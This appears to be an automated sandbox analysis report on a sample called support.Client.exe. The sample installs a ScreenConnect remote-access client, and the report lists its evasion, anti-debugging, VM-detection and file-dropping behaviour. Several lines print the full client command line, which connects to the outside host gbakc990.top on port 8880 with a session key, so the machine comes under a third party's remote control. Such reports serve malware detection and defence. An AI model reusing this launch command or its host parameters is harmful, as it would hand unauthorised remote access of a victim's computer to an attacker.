Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe

Code function: 7_2_00EE1828 sgdt fword ptr [eax]

7_2_00EE1828

Contains long sleeps (>= 3 min)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Window / User API: threadDelayed 834	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Window / User API: threadDelayed 3544	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Window / User API: threadDelayed 5139	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.Core.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\support.Client.exe TID: 7068	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6396	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1696	Thread sleep time: -177200s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1696	Thread sleep time: -256950s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6396	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3060	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2872	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe TID: 2516	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe TID: 2448	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\Desktop\support.Client.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\support.Client.exe	Thread delayed: delay time: 40000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\	Jump to behavior

Source: Amcache.hve.12.dr	Binary or memory string: VMware
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.12.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.12.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.12.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.12.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.12.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.12.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: dfsvc.exe, 00000001.00000002.3571064603.000001AC4F536000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3565549071.000001AC4D6F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3351770488.000001F535A5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3351283239.000001F53042B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.12.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.12.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: ScreenConnect.ClientService.exe, 00000008.00000002.3546257950.00000000007A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.12.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.12.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.12.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.12.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.12.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.12.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.12.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.12.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.12.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.12.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.12.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.12.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.12.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.12.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\support.Client.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\support.Client.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\support.Client.exe

Code function: 0_2_00AD191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00AD191F

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\support.Client.exe

0_2_00AD1000

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\support.Client.exe

Code function: 0_2_00AD3677 mov eax, dword ptr fs:[00000030h]

0_2_00AD3677

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\support.Client.exe

Code function: 0_2_00AD6893 GetProcessHeap,

0_2_00AD6893

Enables debug privileges

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process token adjusted: Debug			Jump to behavior

Launches processes in debugging mode, may be used to hinder debugging

Source: C:\Users\user\Desktop\support.Client.exe

Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"

Jump to behavior

Source: C:\Users\user\Desktop\support.Client.exe	Code function: 0_2_00AD1493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00AD1493
Source: C:\Users\user\Desktop\support.Client.exe	Code function: 0_2_00AD191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00AD191F
Source: C:\Users\user\Desktop\support.Client.exe	Code function: 0_2_00AD4573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00AD4573
Source: C:\Users\user\Desktop\support.Client.exe	Code function: 0_2_00AD1AAC SetUnhandledExceptionFilter,	0_2_00AD1AAC

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: ScreenConnect.ClientService.dll.1.dr, ClientService.cs	Reference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT \| WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=gbakc990.top&p=8880&s=074906cf-7913-4152-acb8-ba6041fce90b&k=BgIAAACkAABSU0ExAAgAAAEAAQCV%2bgTJLvHrJybjJw6NcvaO25WokSvirWMqo0dEE2vOcQcNJ9eH39lX4TPxcS9FirWKTE72z5Z5aT9qfYx6Z7SsW3gRQyCXJKG7lKm2z7mrbxzokPCeA9N7yVfr8VN4w1qYCObq3n3I09zqklSHnlFkUhg9dPWgN6rJljtzEkuqLRuMlM6pUEdMFGNG78jOtwDzUumAfVmBHlhXcfDRYKf9ZDq5MC%2b00HleCSejbkbuH2N%2f29MnCRiB66rZHK5MhlYf3aHKkcTNvy80Z4%2fnvcbI7VyU7XAo9kHuWMoVVof7U68vhKrMivy5PKSsloP9zHL4WOo4AQgjsw5JFyvr%2fP3P&r=&i=dd%20late%20daphny" "1"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7040 -ip 7040
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 692

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\4xk40t58.9ho\hnqgqvpk.8ev\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\screenconnect.clientservice.exe" "?e=support&y=guest&h=gbakc990.top&p=8880&s=074906cf-7913-4152-acb8-ba6041fce90b&k=bgiaaackaabsu0exaagaaaeaaqcv%2bgtjlvhrjybjjw6ncvao25woksvirwmqo0dee2vocqcnj9eh39lx4tpxcs9firwkte72z5z5at9qfyx6z7ssw3grqycxjkg7lkm2z7mrbxzokpcea9n7yvfr8vn4w1qycobq3n3i09zqklshnlfkuhg9dpwgn6rjljtzekuqlrumlm6puedmfgng78jotwdzuumafvmbhlhxcfdrykf9zdq5mc%2b00hlecsejbkbuh2n%2f29mncrib66rzhk5mhlyf3ahkkctnvy80z4%2fnvcbi7vyu7xao9khuwmovvof7u68vhkrmivy5pksslop9zhl4woo4aqgjsw5jfyvr%2fp3p&r=&i=dd%20late%20daphny" "1"
Source: unknown	Process created: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\4xk40t58.9ho\hnqgqvpk.8ev\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\screenconnect.clientservice.exe" "?e=support&y=guest&h=gbakc990.top&p=8880&s=074906cf-7913-4152-acb8-ba6041fce90b&k=bgiaaackaabsu0exaagaaaeaaqcv%2bgtjlvhrjybjjw6ncvao25woksvirwmqo0dee2vocqcnj9eh39lx4tpxcs9firwkte72z5z5at9qfyx6z7ssw3grqycxjkg7lkm2z7mrbxzokpcea9n7yvfr8vn4w1qycobq3n3i09zqklshnlfkuhg9dpwgn6rjljtzekuqlrumlm6puedmfgng78jotwdzuumafvmbhlhxcfdrykf9zdq5mc%2b00hlecsejbkbuh2n%2f29mncrib66rzhk5mhlyf3ahkkctnvy80z4%2fnvcbi7vyu7xao9khuwmovvof7u68vhkrmivy5pksslop9zhl4woo4aqgjsw5jfyvr%2fp3p&r=&i=dd%20late%20daphny" "1"
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\4xk40t58.9ho\hnqgqvpk.8ev\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\screenconnect.clientservice.exe" "?e=support&y=guest&h=gbakc990.top&p=8880&s=074906cf-7913-4152-acb8-ba6041fce90b&k=bgiaaackaabsu0exaagaaaeaaqcv%2bgtjlvhrjybjjw6ncvao25woksvirwmqo0dee2vocqcnj9eh39lx4tpxcs9firwkte72z5z5at9qfyx6z7ssw3grqycxjkg7lkm2z7mrbxzokpcea9n7yvfr8vn4w1qycobq3n3i09zqklshnlfkuhg9dpwgn6rjljtzekuqlrumlm6puedmfgng78jotwdzuumafvmbhlhxcfdrykf9zdq5mc%2b00hlecsejbkbuh2n%2f29mncrib66rzhk5mhlyf3ahkkctnvy80z4%2fnvcbi7vyu7xao9khuwmovvof7u68vhkrmivy5pksslop9zhl4woo4aqgjsw5jfyvr%2fp3p&r=&i=dd%20late%20daphny" "1"	Jump to behavior

Source: ScreenConnect.WindowsClient.exe, 00000006.00000000.1969571966.0000000000C32000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr	Binary or memory string: Progman
Source: ScreenConnect.WindowsClient.exe, 00000006.00000000.1969571966.0000000000C32000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr	Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass

Language, Device and Operating System Detection

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\support.Client.exe

Code function: 0_2_00AD1BD4 cpuid

0_2_00AD1BD4

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
